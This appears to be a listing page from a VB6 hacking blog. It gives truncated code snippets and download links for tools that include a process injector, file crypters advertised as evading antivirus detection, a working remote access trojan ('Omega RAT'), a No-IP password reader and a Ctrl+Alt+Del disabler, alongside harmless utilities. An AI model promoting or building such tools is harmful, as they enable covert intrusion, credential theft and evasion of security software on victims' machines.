code: Option Explicit Private Declare Function GetWindowText Lib "user32" _ Alias "GetWindowTextA" (ByVal hwnd As Long...
Get the name of a Drive
code: Option Explicit Private Declare Function GetVolumeInformation Lib "kernel32" _ Alias "GetVolumeInformationA" (By...
Process Injector
Process Injector can inject your exe to another process. Select process from the list Select your exe click "Inject" ...
File Crypter (Crypt any file and Protect)
This tool can crypt any EXE or any other file and can save without antivirus detection... Note: This is not execute any files normally ...
No-IP Password VB6 code
code: Public Function GetNO_IP(ByRef sUser As String, ByRef sPass As String) As Boolean Dim lhKey As Long Dim sBuffer ...
Disable CtrlAltDel Vb6 Code
Code: Public Function DisableCtrlAltDel() Dim ret As Integer Dim pOld As Boolean ret = SystemParametersInfo(SPI_SCREENSAVERRUNNING, True...
Change EXE icon VB6 Code
Code: Option Explicit Type DIB_HEADER Size As Long Width As Long Height As Long Planes As Integer B...
Photo Slide Maker
This tool can view slide shows. Just copy exe to parent folder and run. Current folder and sub-folders jpg files will play slide show... ...
Omega RAT
This is VB6 RAT code for client and Server both. this project is working one... Download (300 k)
Get Default browser path Vb6
code: Public Function sDBrowserPath() As String Dim oShell As Object Set oShell = CreateObject("WScript.shell") sDBrowserPath =...
Abstract Cryper (Anti reversed engineering)
This Crypter can protect your exe... Virus Scan Report Download (350k) pass: codhacker.blogspot.com